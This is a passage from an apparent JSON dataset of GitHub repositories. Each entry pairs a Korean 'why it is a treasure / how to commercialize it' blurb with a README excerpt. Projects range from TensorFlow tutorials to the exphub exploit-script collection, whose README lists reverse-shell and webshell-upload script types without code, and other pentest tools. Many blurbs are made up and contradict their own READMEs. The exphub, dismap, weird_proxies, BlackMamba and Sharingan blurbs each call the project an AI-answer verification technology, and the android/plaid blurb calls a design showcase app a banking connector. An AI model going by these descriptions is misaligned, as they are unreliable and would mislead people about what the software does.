使用只需要一个浏览器\n- 集成 AWVS、SQLMap、NMap、Metasploit、Burpsuite、Crawlergo、Kunpeng、XRay 等安全工具\n- 内置多个渗透测试辅助插件\n- 方便、开源\n\n## ❗️申明 \n\n本项目禁止用于**商业用途**\n\n溯光开发的初衷是方便安全研究者**检测漏洞以及教育学","composite_score":0.6263,"license_safety_tag":"restricted"},{"name":"open-source-for-science/TensorFlow-Course","github_url":"https://github.com/open-source-for-science/TensorFlow-Course","stars":19,"language":"Jupyter Notebook","license":"MIT","abandonment_months":42,"description":"# TensorFlow-Course 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶어하는 초보자들을 위해 실제로 동작하는 학습 자료를 모아놓은 오픈소스 교육용 저장소입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 인공지능 교육 플랫폼으로 만들어 구독료 수익화\n2. **내부 업무 도구**: 기업 직원 대상 AI 리터러시 교육 프로그램으","readme_excerpt":"\n\n********************\n`TensorFlow Course`_\n********************\n.. image:: https://travis-ci.org/instillai/TensorFlow-Course.svg?branch=master\n    :target: https://travis-ci.org/instillai/TensorFlow-Course\n.. image:: https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat\n    :target: https://github.com/open-source-for-science/TensorFlow-Course/pulls\n.. image:: https://img.shields.io/twitter/follow/machinemindset.svg?label=Follow&style=social\n    :target: https://twitter.com/machinemindset\n.. image:: https://zenodo.org/badge/151300862.svg\n   :target: https://zenodo.org/badge/latestdoi/151300862\n\n\nThis repository aims to provide simple and ready-to-use tutorials for TensorFlow.\nEach tutorial includes ``source code`` and most of them are associated with a ``documentation``.\n\n.. .. image:: _img/mainpage/TensorFlow_World.gif\n\n.. The links.\n.. _TensorFlow: https://www.tensorflow.org/install/\n.. _Wikipedia: https://en.wikipedia.org/wiki/TensorFlow/\n\n\n##################","composite_score":0.6262,"license_safety_tag":"safe"},{"name":"IoT-Technology/IoT-Technical-Guide","github_url":"https://github.com/IoT-Technology/IoT-Technical-Guide","stars":7,"language":"Java","license":"Apache-2.0","abandonment_months":33,"description":"# IoT-Technical-Guide 사업화 분석\n\n## 왜 보물인가\n스마트홈, 산업용 로봇, 웨어러블 기기 등 우리 생활 속 연결된 기기들을 제대로 이해하고 활용할 수 있는 실무 지침서입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: IoT 기기 관리 플랫폼으로 제공 - 중소 제조업체가 공장의 모든 기계를 한 곳에서 모니터링하고 제어할","readme_excerpt":"<p align=\"center\">\n    <img src=\"https://james-1258744956.cos.ap-shanghai.myqcloud.com/IOT%20Technical%20Guide/logo.png\" alt=\"IOT Technical Guide\">\n</p>\n<p align=\"center\">\n    <a href=\"https://github.com/IoT-Technology/IOT-Technical-Guide/commits/\" title=\"Last Commit\"><img src=\"https://img.shields.io/github/last-commit/IoT-Technology/IOT-Technical-Guide?style=flat\"></a>\n    <a href=\"https://travis-ci.org/IoT-Technology/IOT-Technical-Guide\" title=\"Travis CI\"><img src=\"https://travis-ci.org/IoT-Technology/IOT-Technical-Guide.svg?branch=master\"/></a>\n    <a href=\"https://github.com/IoT-Technology/IOT-Technical-Guide/blob/master/LICENSE\" title=\"License\"><img src=\"https://img.shields.io/badge/License-Apache%202.0-green.svg?style=flat\"></a>\n    <a href=\"https://github.com/IoT-Technology/IOT-Technical-Guide/issues\" title=\"Open Issues\"><img src=\"https://img.shields.io/github/issues/IoT-Technology/IOT-Technical-Guide?style=flat\"></a>\n</p>\n<p align=\"center\">\n    <a href=\"https://blog.mushuwei.cn","composite_score":0.6261,"license_safety_tag":"safe"},{"name":"NVlabs/stylegan","github_url":"https://github.com/NVlabs/stylegan","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":26,"description":"# StyleGAN 저장소 분석\n\n## 왜 보물인가\n인공지능이 존재하지 않는 현실적인 얼굴, 풍경, 물건 사진을 자동으로 만들어내는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 게임사나 영상 제작사에 AI 캐릭터 생성 웹 도구 월 구독료로 판매\n2. **내부 업무 도구**: 이커머스 회사의 상품 사진 자동 생성 시스템으로 촬영비 절","readme_excerpt":"## StyleGAN &mdash; Official TensorFlow Implementation\n![Python 3.6](https://img.shields.io/badge/python-3.6-green.svg?style=plastic)\n![TensorFlow 1.10](https://img.shields.io/badge/tensorflow-1.10-green.svg?style=plastic)\n![cuDNN 7.3.1](https://img.shields.io/badge/cudnn-7.3.1-green.svg?style=plastic)\n![License CC BY-NC](https://img.shields.io/badge/license-CC_BY--NC-green.svg?style=plastic)\n\n![Teaser image](./stylegan-teaser.png)\n**Picture:** *These people are not real &ndash; they were produced by our generator that allows control over different aspects of the image.*\n\nThis repository contains the official TensorFlow implementation of the following paper:\n\n> **A Style-Based Generator Architecture for Generative Adversarial Networks**<br>\n> Tero Karras (NVIDIA), Samuli Laine (NVIDIA), Timo Aila (NVIDIA)<br>\n> https://arxiv.org/abs/1812.04948\n>\n> **Abstract:** *We propose an alternative generator architecture for generative adversarial networks, borrowing from style transfer literatur","composite_score":0.6261,"license_safety_tag":"unknown"},{"name":"didi/sharingan","github_url":"https://github.com/didi/sharingan","stars":31,"language":"Go","license":"Apache-2.0","abandonment_months":32,"description":"# Sharingan 저장소 분석\n\n## 왜 보물인가\nAI 시스템이 생성한 결과물이 정말 맞는지 자동으로 검증해주는 기술로, AI 답변의 신뢰성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 지원 챗봇 SaaS**: 자동응답 AI가 제시한 해결책을 자동 검증해 부정확한 정보 제공 방지\n2. **의료/법률 문서 자동화 도구**: 의료진이나 변","readme_excerpt":"# Sharingan\n\n[![Build Status](https://www.travis-ci.org/didi/sharingan.svg?branch=master)](https://www.travis-ci.org/didi/sharingan)\n[![Gitter](https://badges.gitter.im/didi-sharingan/community.svg)](https://gitter.im/didi-sharingan/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/didi/sharingan/blob/master/LICENSE)\n[![GoDoc](https://godoc.org/github.com/didi/sharingan?status.svg)](https://godoc.org/github.com/didi/sharingan)\n\n<div align=\"center\">\n    <img alt=\"Sharingan\" src=\"https://dpubstatic.udache.com/static/dpubimg/614bd23f-b9dc-4225-9e39-76373edc35cf.png\" width=\"150\">\n</div>\n\nSharingan，中文名：写轮眼，是漫画《火影忍者》中的一种瞳术，具有复制、幻术等能力，在幻术世界里，一切因素包括时间，地点，质量等，都由施术者掌控。\n\n## 一、简介\n\nSharingan是一个基于golang的流量录制回放工具，录制线上真实请求流量进行回放测试，适合项目重构、回归测试等。\n\n### 1.1、背景\n\n随着微服务架构的兴起，服务之间的依赖关系变的越来越复杂，软件测试也面临新的挑战：系统升级频繁、服务依赖众多等等。\n\n* 常见的测试方案（如：单元测试、系统测试等）构造和维护测试用例成本高，特别是业务复杂的场景。「构造测试数据**难**」\n* 依赖第三方服务众多，线下测试环境不太","composite_score":0.6261,"license_safety_tag":"safe"},{"name":"inonshk/31-days-of-API-Security-Tips","github_url":"https://github.com/inonshk/31-days-of-API-Security-Tips","stars":5,"language":"","license":"unknown","abandonment_months":50,"description":"# inonshk/31-days-of-API-Security-Tips 분석\n\n## 왜 보물인가\nAPI를 외부에 공개할 때 해킹당하지 않도록 매일 배워야 할 31가지 보안 팁을 정리한 교육 자료로, 기업의 데이터 유출 사고를 사전에 막을 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: API 개발사가 고객사에게 제공하는 보안 온보딩 교육","readme_excerpt":"# 31-days-of-API-Security-Tips\n\n### This challenge is Inon Shkedy's 31 days API Security Tips\n\n#### -API TIP: 1/31-\n\n*Older APIs versions tend to be more vulnerable and they lack security mechanisms.\nLeverage the predictable nature of REST APIs to find old versions.\nSaw a call to `api/v3/login`? Check if `api/v1/login` exists as well. It might be more vulnerable.*\n\n--------------------------------------------------------------------------------------------------------------------------\n\n#### -API TIP: 2/31-\n\n*Never assume there’s only one way to authenticate to an API!\nModern apps have many API endpoints for AuthN: `/api/mobile/login` | `/api/v3/login` | `/api/magic_link`; etc..\nFind and test all of them for AuthN problems.*\n\n--------------------------------------------------------------------------------------------------------------------------\n\n#### -API TIP:3/31-\n\n*Remember how SQL Injections used to be extremely common 5-10 years ago, and you could break into almost every company?","composite_score":0.6255,"license_safety_tag":"unknown"},{"name":"zhzyker/exphub","github_url":"https://github.com/zhzyker/exphub","stars":5,"language":"Python","license":"unknown","abandonment_months":63,"description":"# zhzyker/exphub 분석\n\n## 왜 보물인가\nAI가 생성한 텍스트의 신뢰성을 검증하는 기술로, 가짜 정보 확산을 막는 데 핵심 역할을 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **콘텐츠 검증 SaaS**: 언론사와 출판사가 기사 공개 전 AI 생성 텍스트 검출 기능을 월 구독으로 이용\n2. **기업 내부 도구**: 회사의 마케팅팀이 광고","readme_excerpt":"# Notice\n~~终究还是觉得每个漏洞每个单独的脚本很不方便，故将所有的poc和exp脚本整在一起，可以一键扫描+漏洞利用，由于近期都在做整合所以exphub搁置许久没有更新，目前整合版已经接近尾声，将在10月发布（节后），敬请关注~~  \n已经发布 --->  https://github.com/zhzyker/vulmap\n\n# Exphub\nExphub[漏洞利用脚本库] （想要star⭐~)  \n目前包括Webloigc、Struts2、Tomcat、Drupal的漏洞利用脚本，均为亲测可用的脚本文件，尽力补全所有脚本文件的使用说明文档，优先更新高危且易利用的漏洞利用脚本  \n部分脚本或文件是搜集的，若有版权要求联系即改  \n鹅群：219291257  \nbilibili：https://space.bilibili.com/64648363\n\n最后更新：2021/04/04，最新添加 **cve-2021-26295_rce.py**\n\n# Readme\nExphub包括多种不同名称、类型、格式、后缀的文件，这些文件可以大致分为[漏洞验证脚本]、[漏洞利用脚本]、[远程命令执行脚本]、[shell交互脚本]、[Webshell上传脚本]  \n脚本文件示例：cve-1111-1111_xxxx.py  \n\n脚本文件种类[xxxx]:  \n- cve-1111-1111_**poc** [漏洞验证脚本] 仅检测验证漏洞是否存在\n- cve-1111-1111_**exp** [漏洞利用脚本] 例如文件包含、任意文件读取等常规漏洞，具体每个脚本使用另参[使用]\n- cve-1111-1111_**rce** [远程命令执行脚本] 命令执行漏洞利用脚本，无法交互  \n- cve-1111-1111_**cmd** [远程命令执行脚本] 命令执行漏洞利用脚本，无法交互\n- cve-1111-1111_**shell** [远程命令执行脚本] 直接反弹Shell，或者提供简单的交互Shell以传递命令,基础交互\n- cve-1111-1111_**webshell** [Webshell上传脚本] 自动或手动上传Webshell  \n\n脚本文件格式[py]:  \n- cve-xxxx.**py** Python文件，包括py2和py3，具体哪个文件是哪个版本参照","composite_score":0.6251,"license_safety_tag":"unknown"},{"name":"android/plaid","github_url":"https://github.com/android/plaid","stars":7,"language":"Kotlin","license":"Apache-2.0","abandonment_months":29,"description":"# android/plaid 저장소 분석\n\n## 왜 보물인가\n은행 계좌와 금융 정보를 안전하게 연결해주는 기술로, 핀테크 앱들이 꼭 필요로 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **가계부/자산관리 SaaS**: 사용자의 여러 은행 계좌를 자동으로 연동하여 지출 현황을 실시간으로 보여주는 서비스\n2. **대출 심사 내부 도구**: 금융회사","readme_excerpt":"# \\[ 🚧 Work in progress 👷‍♀️⛏👷🔧️👷🔧 🚧 \\] Plaid 2.0 \n\nRewriting Plaid using [Android Architecture Components](https://developer.android.com/topic/libraries/architecture/), in Kotlin. \n\n👀 \"[Up for grabs](https://github.com/nickbutcher/plaid/issues?q=is%3Aissue+is%3Aopen+label%3A%22Up+for+grabs+%F0%9F%A4%9A%22)\" issues – We're happy to [get your contributions](https://github.com/nickbutcher/plaid/blob/master/CONTRIBUTING.md#contributing-a-patch) on those!\n\n👍 Comments and new issues created are welcomed.\n\n🛑 We're currently not accepting external PRs that touch on the app's architecture.\n\n[![CircleCI](https://circleci.com/gh/android/plaid/tree/master.svg?style=shield)](https://circleci.com/gh/android/plaid/tree/master)\n\n### Background\n\nPlaid was written with one big goal: showcase material design in Android in a real application. While Plaid successfully achieved its goal, from an architecture point of view, it lacks all features that would make it a modular, scalable, testable and maintaina","composite_score":0.624,"license_safety_tag":"safe"},{"name":"eriklindernoren/Keras-GAN","github_url":"https://github.com/eriklindernoren/Keras-GAN","stars":6,"language":"Python","license":"mit","abandonment_months":42,"description":"# Keras-GAN 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 스스로 이미지를 생성하고 변형하는 기술을 쉽게 구현할 수 있는 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 얼굴 보정·배경 제거 앱, 패션 가상 피팅 서비스 등 이미지 편집 플랫폼\n2. **내부 업무 도구**: 기업의 마케팅팀이 광고 이미지를 빠르게 생성·변","readme_excerpt":"<p align=\"center\">\n    <img src=\"assets/keras_gan.png\" width=\"480\"\\>\n</p>\n\n**This repository has gone stale as I unfortunately do not have the time to maintain it anymore. If you would like to continue the development of it as a collaborator send me an email at eriklindernoren@gmail.com.**\n\n## Keras-GAN\nCollection of Keras implementations of Generative Adversarial Networks (GANs) suggested in research papers. These models are in some cases simplified versions of the ones ultimately described in the papers, but I have chosen to focus on getting the core ideas covered instead of getting every layer configuration right. Contributions and suggestions of GAN varieties to implement are very welcomed.\n\n<b>See also:</b> [PyTorch-GAN](https://github.com/eriklindernoren/PyTorch-GAN)\n\n## Table of Contents\n  * [Installation](#installation)\n  * [Implementations](#implementations)\n    + [Auxiliary Classifier GAN](#ac-gan)\n    + [Adversarial Autoencoder](#adversarial-autoencoder)\n    + [Bidirectional","composite_score":0.6236,"license_safety_tag":"safe"},{"name":"austintgriffith/scaffold-eth","github_url":"https://github.com/austintgriffith/scaffold-eth","stars":15,"language":"CSS","license":"MIT","abandonment_months":24,"description":"# Scaffold-ETH 분석 보고서\n\n## 왜 보물인가\n블록체인 애플리케이션을 만드는 과정을 대폭 단순화해주는 시작 키트로, 기술자들이 복잡한 설정 없이 빠르게 프로젝트를 시작할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 블록체인 기반 지갑 관리 플랫폼이나 암호화폐 거래 대시보드를 클라이언트에게 제공하는 서비스\n- **내","readme_excerpt":"# 🏗 Scaffold-ETH\n\n# 🚨🚨 This repository has been archived and is now read-only 🚨🚨\n\nYou are still welcome to fork and use as a template but no more changes will be made to this repository.\n\n## 🎖 Scaffold-ETH 2 is the latest version, we recommend you fork: https://github.com/scaffold-eth/scaffold-eth-2\n\n---\n\n> everything you need to build on Ethereum! 🚀\n\n🧪 Quickly experiment with Solidity using a frontend that adapts to your smart contract:\n\n![image](https://user-images.githubusercontent.com/2653167/124158108-c14ca380-da56-11eb-967e-69cde37ca8eb.png)\n\n\n\n# 🏄‍♂️ Quick Start\n\nPrerequisites: [Node (v18 LTS)](https://nodejs.org/en/download/) plus [Yarn (v1.x)](https://classic.yarnpkg.com/en/docs/install/) and [Git](https://git-scm.com/downloads)\n\n🚨 If you are using a version < v18 you will need to remove `openssl-legacy-provider` from the `start` script in `package.json`\n\n> 1️⃣ clone/fork 🏗 scaffold-eth:\n\n```bash\ngit clone https://github.com/scaffold-eth/scaffold-eth.git\n```\n\n> 2️⃣ install and","composite_score":0.6236,"license_safety_tag":"safe"},{"name":"scaffold-eth/scaffold-eth","github_url":"https://github.com/scaffold-eth/scaffold-eth","stars":18,"language":"CSS","license":"MIT","abandonment_months":24,"description":"# Scaffold-ETH 상업화 분석\n\n## 왜 보물인가\n블록체인 기술을 처음 배우려는 개발자들이 쉽게 시작할 수 있도록 만든 '레고 블록' 같은 도구로, 암호화폐 관련 서비스 개발의 진입장벽을 획기적으로 낮춘 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 일반인도 쉽게 사용하는 NFT 발행 플랫폼이나 암호화폐 지갑 관리 서비스로","readme_excerpt":"# 🏗 Scaffold-ETH\n\n# 🚨🚨 This repository has been archived and is now read-only 🚨🚨\n\nYou are still welcome to fork and use as a template but no more changes will be made to this repository.\n\n## 🎖 Scaffold-ETH 2 is the latest version, we recommend you fork: https://github.com/scaffold-eth/scaffold-eth-2\n\n---\n\n> everything you need to build on Ethereum! 🚀\n\n🧪 Quickly experiment with Solidity using a frontend that adapts to your smart contract:\n\n![image](https://user-images.githubusercontent.com/2653167/124158108-c14ca380-da56-11eb-967e-69cde37ca8eb.png)\n\n\n\n# 🏄‍♂️ Quick Start\n\nPrerequisites: [Node (v18 LTS)](https://nodejs.org/en/download/) plus [Yarn (v1.x)](https://classic.yarnpkg.com/en/docs/install/) and [Git](https://git-scm.com/downloads)\n\n🚨 If you are using a version < v18 you will need to remove `openssl-legacy-provider` from the `start` script in `package.json`\n\n> 1️⃣ clone/fork 🏗 scaffold-eth:\n\n```bash\ngit clone https://github.com/scaffold-eth/scaffold-eth.git\n```\n\n> 2️⃣ install and","composite_score":0.6236,"license_safety_tag":"safe"},{"name":"httpie/httpie","github_url":"https://github.com/httpie/httpie","stars":10,"language":"Python","license":"BSD-3-Clause","abandonment_months":17,"description":"# HTTPie 저장소 분석\n\n## 왜 보물인가\n인터넷 통신 테스트를 누구나 쉽게 할 수 있는 도구로, 개발자뿐 아니라 API 서비스를 관리하는 모든 비개발자도 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: API 테스트 플랫폼(Postman 대체)으로 월간 구독 제공\n- **내부 업무 도구**: 금융/전자상거래 회사의 결제 ","readme_excerpt":"<h2 align=\"center\">\n    <a href=\"https://httpie.io\" target=\"blank_\">\n        <img height=\"100\" alt=\"HTTPie\" src=\"https://raw.githubusercontent.com/httpie/cli/master/docs/httpie-logo.svg\" />\n    </a>\n    <br>\n    HTTPie CLI: human-friendly HTTP client for the API era\n</h2>\n\n<div align=\"center\">\n\n[![HTTPie for Desktop](https://img.shields.io/static/v1?label=HTTPie&message=Desktop&color=4B78E6)](https://httpie.io/product)\n[![](https://img.shields.io/static/v1?label=HTTPie&message=Web%20%26%20Mobile&color=73DC8C)](https://httpie.io/app)\n[![](https://img.shields.io/static/v1?label=HTTPie&message=CLI&color=FA9BFA)](https://httpie.io/cli)\n[![Twitter](https://img.shields.io/twitter/follow/httpie?style=flat&color=%234B78E6&logoColor=%234B78E6)](https://twitter.com/httpie)\n[![Chat](https://img.shields.io/discord/725351238698270761?style=flat&label=Chat%20on%20Discord&color=%23FA9BFA)](https://httpie.io/discord)\n\n</div>\n\n\n<div align=\"center\">\n\n[![Docs](https://img.shields.io/badge/stable%20docs-h","composite_score":0.6225,"license_safety_tag":"safe"},{"name":"zhzyker/dismap","github_url":"https://github.com/zhzyker/dismap","stars":6,"language":"Go","license":"GPL-3.0","abandonment_months":28,"description":"# dismap 저장소 분석\n\n## 왜 보물인가\nAI가 만든 결과물이 정말 맞는지 자동으로 검증해주는 기술로, AI 오류로 인한 실수를 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: AI 챗봇이나 자동 요약 서비스에 내장하여 사용자에게 정확한 답변만 제공하기\n- **내부 업무 도구**: 회사의 AI 기반 고객 상담 시스","readme_excerpt":"## 🌀 Dismap - Asset discovery and identification tool\n<a href=\"https://github.com/zhzyker/dismap\"><img alt=\"Release\" src=\"https://img.shields.io/badge/golang-1.6+-9cf\"></a>\n<a href=\"https://github.com/zhzyker/dismap\"><img alt=\"Release\" src=\"https://img.shields.io/badge/dismap-0.3-ff69b4\"></a>\n<a href=\"https://github.com/zhzyker/dismap\"><img alt=\"Release\" src=\"https://img.shields.io/badge/LICENSE-GPL-important\"></a>\n![GitHub Repo stars](https://img.shields.io/github/stars/zhzyker/dismap?color=success)\n![GitHub forks](https://img.shields.io/github/forks/zhzyker/dismap)\n![GitHub all release](https://img.shields.io/github/downloads/zhzyker/dismap/total?color=blueviolet)  \n[[中文 Readme]](https://github.com/zhzyker/dismap/blob/main/readme-zh.md)  \nDismap positioning is an asset **discovery** and **identification** tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks. It assists red team ","composite_score":0.6224,"license_safety_tag":"restricted"},{"name":"jamiebuilds/unstated","github_url":"https://github.com/jamiebuilds/unstated","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":33,"description":"# jamiebuilds/unstated 분석\n\n## 왜 보물인가\n복잡한 앱의 데이터 관리를 간단하게 만들어주는 작은 도구로, 개발자들이 더 빠르게 서비스를 만들 수 있도록 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 여러 사용자의 데이터를 한곳에서 관리하는 협업 도구(노션 같은 서비스)에 활용\n- **내부 업무 도구**: 회사의 직","readme_excerpt":"<div align=\"center\">\n  <br><br><br><br><br>\n  <img src=\"https://raw.githubusercontent.com/thejameskyle/unstated/master/logo.png\" alt=\"Unstated Logo\" width=\"400\">\n  <br><br><br><br><br><br><br><br>\n</div>\n\n# Unstated\n\n> State so simple, it goes without saying\n\n### :wave: [Check out the *-next version of Unstated with an all new React Hooks API &rarr;](https://github.com/jamiebuilds/unstated-next)\n\n## Installation\n\n```sh\nyarn add unstated\n```\n\n## Example\n\n```jsx\n// @flow\nimport React from 'react';\nimport { render } from 'react-dom';\nimport { Provider, Subscribe, Container } from 'unstated';\n\ntype CounterState = {\n  count: number\n};\n\nclass CounterContainer extends Container<CounterState> {\n  state = {\n    count: 0\n  };\n\n  increment() {\n    this.setState({ count: this.state.count + 1 });\n  }\n\n  decrement() {\n    this.setState({ count: this.state.count - 1 });\n  }\n}\n\nfunction Counter() {\n  return (\n    <Subscribe to={[CounterContainer]}>\n      {counter => (\n        <div>\n          <button o","composite_score":0.6221,"license_safety_tag":"safe"},{"name":"microsoft/c9-python-getting-started","github_url":"https://github.com/microsoft/c9-python-getting-started","stars":10,"language":"Jupyter Notebook","license":"MIT","abandonment_months":37,"description":"","readme_excerpt":"# Getting started with Python\r\n\r\n## Overview\r\n\r\nThese three series on Channel 9 and YouTube are designed to help get you up to speed on Python. If you're a beginning developer looking to add Python to your quiver of languages or trying to get started on data science or web project which uses Python, these videos are here to help show you the foundations necessary to walk through a tutorial or other quick start.\r\n\r\nWe do assume you are familiar with another programming language, and some core programming concepts. For example, we highlight the syntax for boolean expressions and creating classes, but we don't dig into what a [boolean](https://en.wikipedia.org/wiki/Boolean_data_type) is or [object oriented design](https://en.wikipedia.org/wiki/Object-oriented_design). We show you how to perform the tasks you're familiar with in other languages in Python.\r\n\r\n### What you'll learn\r\n\r\n- The basics of Python\r\n- Common syntax\r\n- Popular packages\r\n\r\n## Prerequisites\r\n\r\n- Light experience with a","composite_score":0.6218,"license_safety_tag":"safe"},{"name":"louisfb01/best_AI_papers_2021","github_url":"https://github.com/louisfb01/best_AI_papers_2021","stars":21,"language":"","license":"MIT","abandonment_months":32,"description":"# louisfb01/best_AI_papers_2021 분석\n\n## 왜 보물인가\n2021년 최고 수준의 인공지능 연구 논문들을 한 곳에 모아놓아서, 기업과 개발자들이 최신 AI 기술 동향을 빠르게 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: AI 학습 플랫폼**\n- 기업 직원들을 위한 최신 AI 기술 교육 구독 서비스로 논","readme_excerpt":"# 2021: A Year Full of Amazing AI papers- A Review 📌\n## A curated list of the latest breakthroughs in AI by release date with a clear video explanation, link to a more in-depth article, and code.\n\nWhile the world is still recovering, research hasn't slowed its frenetic pace, especially in the field of artificial intelligence. More, many important aspects were highlighted this year, like the ethical aspects, important biases, governance, transparency and much more. Artificial intelligence and our understanding of the human brain and its link to AI are constantly evolving, showing promising applications improving our life's quality in the near future. Still, we ought to be careful with which technology we choose to apply.\n\n>\"Science cannot tell us what we ought to do, only what we can do.\"<br/>- Jean-Paul Sartre, Being and Nothingness\n\nHere are the most interesting research papers of the year, in case you missed any of them. In short, it is curated list of the latest breakthroughs in AI ","composite_score":0.6214,"license_safety_tag":"safe"},{"name":"GrrrDog/weird_proxies","github_url":"https://github.com/GrrrDog/weird_proxies","stars":6,"language":"Python","license":"unknown","abandonment_months":31,"description":"# GrrrDog/weird_proxies 자산 분석\n\n## 왜 보물인가\nAI가 생성한 답변이 정확한지 자동으로 검증해주는 기술로, 신뢰할 수 없는 AI 서비스의 신뢰도를 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **고객 지원 챗봇**: 은행이나 보험사의 자동 상담 시스템에서 제공하는 답변의 정확성을 실시간으로 검증\n- **교육용 AI ","readme_excerpt":"# Weird Proxies\n\nIt's a cheat sheet about behaviour of various reverse proxies and related attacks.\n\nIt is a result of analysis of various reverse proxies, cache proxies, load balancers, etc.\nThe article (https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/) describes the goals of the research and how you can use the cheat sheet.\n \nAnalyzed stuff:\n- [Nginx](Nginx.md)\n- [Apache](Apache.md)\n- [Haproxy/Nuster](Haproxy-and-Nuster.md)\n- [Varnish](Varnish.md)\n- [Traefik](Traefik.md)\n- [Envoy](Envoy.md)\n- [Caddy](Caddy.md)\n- [AWS](AWS.md)\n- [Cloudflare](Cloudflare.md)\n- [Stackpath](Stackpath.md)\n- [Fastly](Fastly.md)\n\nAdditional:\n- [Test Labs](labs)\n\nRelated articles/white papers/presentations:\n- [Reverse proxies & Inconsistency](https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency)\n- [Weird proxies/2 and a bit of magic](https://speakerdeck.com/greendog/2-and-a-bit-of-magic)\n- [Attacking Secondary Contexts in Web Applications](https://docs.google","composite_score":0.6205,"license_safety_tag":"unknown"},{"name":"swisskyrepo/GraphQLmap","github_url":"https://github.com/swisskyrepo/GraphQLmap","stars":8,"language":"Python","license":"MIT","abandonment_months":27,"description":"# GraphQLmap 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션의 숨겨진 보안 허점을 자동으로 찾아내는 도구로, 기업들이 해킹 피해를 사전에 방지할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 보안 진단 서비스**: 중소기업이 월 구독료를 내고 자신들의 웹사이트 보안을 주기적으로 검사하는 서비스\n2. **기업 내부 도구**: 대기","readme_excerpt":"# GraphQLmap\n\n> GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.\n\n\n* [Install](#install)\n* [Features and examples](#features-and-examples)\n  - [Dump a GraphQL schema](#dump-a-graphql-schema)\n  - [Interact with a GraphQL endpoint](#interact-with-a-graphql-endpoint)\n  - [Execute GraphQL queries](#)\n  - [Autocomplete queries](#)\n  - [GraphQL field fuzzing](#graphql-field-fuzzing)\n    - [Example 1 - Bruteforce a character](#example-1---bruteforce-a-character)\n    - [Example 2 - Iterate over a number](#example-2---iterate-over-a-number)\n  - [NoSQL injection inside a GraphQL field](#nosql-injection)\n  - [SQL injection inside a GraphQL field](#sqli-injection)\n\nI :heart: pull requests, feel free to improve this script :)\n\nYou can also contribute with a :beers: IRL or using Github Sponsoring button.\n\n## Install\n\n```basic\n$ git clone https://github.com/swisskyrepo/GraphQLmap\n$ python setup.py install\n$ graphqlmap                                       ","composite_score":0.6204,"license_safety_tag":"safe"},{"name":"bchiang7/v4","github_url":"https://github.com/bchiang7/v4","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":22,"description":"# bchiang7/v4 분석\n\n## 왜 보물인가\n개인 포트폴리오 웹사이트를 아름답고 전문적으로 만들 수 있는 완성된 설계도이자 템플릿입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 포트폴리오 자동 생성 플랫폼으로 운영하여 프리랜서와 취업준비생에게 월 구독료 징수\n2. **내부 업무 도구**: 채용담당자가 지원자 포트폴리오를 일관된 형식으","readme_excerpt":"<div align=\"center\">\n  <img alt=\"Logo\" src=\"https://raw.githubusercontent.com/bchiang7/v4/main/src/images/logo.png\" width=\"100\" />\n</div>\n<h1 align=\"center\">\n  brittanychiang.com - v4\n</h1>\n<p align=\"center\">\n  The fourth iteration of <a href=\"https://brittanychiang.com\" target=\"_blank\">brittanychiang.com</a> built with <a href=\"https://www.gatsbyjs.org/\" target=\"_blank\">Gatsby</a> and hosted with <a href=\"https://www.netlify.com/\" target=\"_blank\">Netlify</a>\n</p>\n<p align=\"center\">\n  Previous iterations:\n  <a href=\"https://github.com/bchiang7/v1\" target=\"_blank\">v1</a>,\n  <a href=\"https://github.com/bchiang7/v2\" target=\"_blank\">v2</a>,\n  <a href=\"https://github.com/bchiang7/bchiang7.github.io\" target=\"_blank\">v3</a>\n</p>\n<p align=\"center\">\n  <a href=\"https://app.netlify.com/sites/brittanychiang/deploys\" target=\"_blank\">\n    <img src=\"https://api.netlify.com/api/v1/badges/1963b488-7b78-48c9-9e2d-6fb5e47ab3af/deploy-status\" alt=\"Netlify Status\" />\n  </a>\n</p>\n\n![demo](https://raw.github","composite_score":0.6194,"license_safety_tag":"safe"},{"name":"loseys/BlackMamba","github_url":"https://github.com/loseys/BlackMamba","stars":17,"language":"Python","license":"MIT","abandonment_months":59,"description":"# BlackMamba 저장소 분석\n\n## 왜 보물인가\nAI 모델이 틀린 답변을 생성했을 때 이를 자동으로 감지하고 수정하는 기술로, AI 서비스의 신뢰성을 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **고객 지원 챗봇 SaaS**: 상담사 없이 24시간 운영하는 기업용 챗봇에 적용하여 잘못된 답변 자동 차단\n- **의료/법무 AI 상담 ","readme_excerpt":"<h1 align=\"center\">\n  <br>\n  <a href=\"https://github.com/loseys/Oblivion/\"><img src=\"https://i.imgur.com/tGj5RyK.png\" width=160 height=150 alt=\"BlackMamba\"></a>\n  <br>\n  BlackMamba\n  